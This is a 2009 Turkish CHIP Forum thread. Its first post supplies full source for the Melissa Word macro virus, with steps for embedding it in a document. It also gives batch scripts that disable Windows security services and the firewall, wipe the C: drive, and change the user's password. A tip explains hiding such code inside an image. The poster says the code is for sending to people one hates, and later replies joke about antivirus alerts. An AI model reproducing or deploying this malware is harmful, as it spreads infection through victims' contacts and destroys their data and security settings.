CHIP Forum
Haber
İnceleme
Makale
CHIP TV
Galeri
Kategoriler
Forum
Canlı Yayın
Konu Seçenekleri

Virüs Kodları 2

Üye
UID
100425
Mesaj
181
Kayıt
12 Ara 2008

Blog Sayfası
Kişisel Sayfası
Engelle

21 Oca 2009 17:06     #1
2 sene önce dünya bilgisayar piyasasını altüst eden bir virüs.
Yapımı:
Bir Microsft Word belgesi açyoruz.Daha sonra yeni belge açıp Alt + f11'e basarak Microsoft Visual Basic'i açıyoruz
Project 1 / Microsoft Word objects / This Document seklinde 3 lü bir seçim geliyor karşımıza...
This Documenti seçmeliyiz bu aşamada. Seçimi yaptıktan sonra asagıda verilmış olan Melısssa kodlarını yapıştırıyoruz ve kaydediyoruz bu belgeyi.
Melissa Visuel Basic virüsüdür. .Exe olamaması bunu inandırma oranını 100 de 100 arttırr .
Fakat panda,norton,mcafee,mks virüs olarak buluyor ancak kaspersky(5.0) ve avast(4.7) tanımıyor tabi avg eksik kalıyor bu konuda.
Not: Çalışıyor. Denendi.
Melıssa Kodları:

Private Sub Document_Open() ' Writted By eXit
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
____________________________________________________________
2. Virüs
____________________________________________________________

KOD:


@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0



Not defterine kopyalayıp adını virüs.bat veya virüs.cmd olarak kaydedin
Herhangi bir resim ile birleştirmek isterseniz ;

Resme sağ tıklayın Birlikte Aç >Not Defteri yapıp kodu resmin sonuna ekleyin.

Not: Kaspersky , Norton , NOD32 , Avast gibi anti virüslere yakalanmaktadır.
____________________________________________________________
3. Virüs
____________________________________________________________

@echo off
C:\WINDOWS\COMMAND\deltree /y......
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls

Uzantı: .bat
____________________________________________________________
4.Virüs
____________________________________________________________
Kodlar:
net user %username% 753951456852
shutdown -r

Uzantı: .bat
____________________________________________________________

İstekleriniz için profilime Özel Mesaj atın.

Gülümseme Yorumlarınızı bekliyorum. Gülümseme
 
Bildir
Teşekkür et Yanıtla Alıntıla
Üye
REP: 356, 3,81
UID
79579
Mesaj
2690
Kayıt
12 Tem 2008

Kişisel Sayfası
Engelle

21 Oca 2009 17:09     #2
Biz bunları ne yapıcaz?
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
UID
100425
Mesaj
181
Kayıt
12 Ara 2008

Blog Sayfası
Kişisel Sayfası
Engelle

21 Oca 2009 17:15     #3
mystical
Biz bunları ne yapıcaz?
Belki sevmediğin ve nefret ettiğin birisine yollarsın.
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
REP: 356, 3,81
UID
79579
Mesaj
2690
Kayıt
12 Tem 2008

Kişisel Sayfası
Engelle

21 Oca 2009 17:20     #4
boraalper
Belki sevmediğin ve nefret ettiğin birisine yollarsın.
Hiç böyle düşünmemiştimGülümseme Ama benim yapacağım bir şey değil.Göz kırpma Bu arada forumda böyle virüs kodlarının yayınlanmasına izin veriliyor mu??
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
REP: 231, 3,67
UID
70070
Mesaj
2345
Kayıt
19 Nis 2008

Blog Sayfası
Kişisel Sayfası
Engelle

21 Oca 2009 22:11     #5
melissa cok kuvvetli bi vürüstü zamanında ama artık antiler hemen tanıyor eset smart bu sayfaya girmeme izin vermedi avira vürüsü yapmadan öttü :D
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
UID
87396
Mesaj
1585
Kayıt
10 Eyl 2008

Kişisel Sayfası
Engelle

21 Oca 2009 22:14     #6
valla ya avira cırıt cırıt diye öttü kaydettiğim anda :D
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
REP: 168, 3,84
UID
103407
Mesaj
1388
Kayıt
04 Oca 2009

Blog Sayfası
Kişisel Sayfası
Engelle

22 Oca 2009 00:33     #7
undefined
net user %username% 753951456852
shutdown -r
sınırlı hesap kullanmanın yararları

sınırlı hesap kullanıosan calısmaz kullanmıosan sifre gitti sıkıysa sıfırlamayla ugrasKahkaha
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
UID
94465
Mesaj
1678
Kayıt
27 Eki 2008

Blog Sayfası
Kişisel Sayfası
Engelle

22 Oca 2009 01:23     #8
iyi arşiw bende pc ye gelen tüm virüsleri rar layıp arşivliyorum.şimdiden baya birikti... :)
 
Bildir Teşekkür et Yanıtla Alıntıla
Üye
UID
83985
Mesaj
432
Kayıt
13 Ağu 2008

Kişisel Sayfası
Engelle

22 Oca 2009 13:33     #9
physfg
iyi arşiw bende pc ye gelen tüm virüsleri rar layıp arşivliyorum.şimdiden baya birikti... :)
eehehe napcaksan artık
 
Bildir Teşekkür et Yanıtla Alıntıla
Yeni Üye
UID
110305
Mesaj
1
Kayıt
14 Şub 2009

Kişisel Sayfası
Engelle

14 Şub 2009 18:34     #10
daha iyisi var mı?
 
Bildir Teşekkür et Yanıtla Alıntıla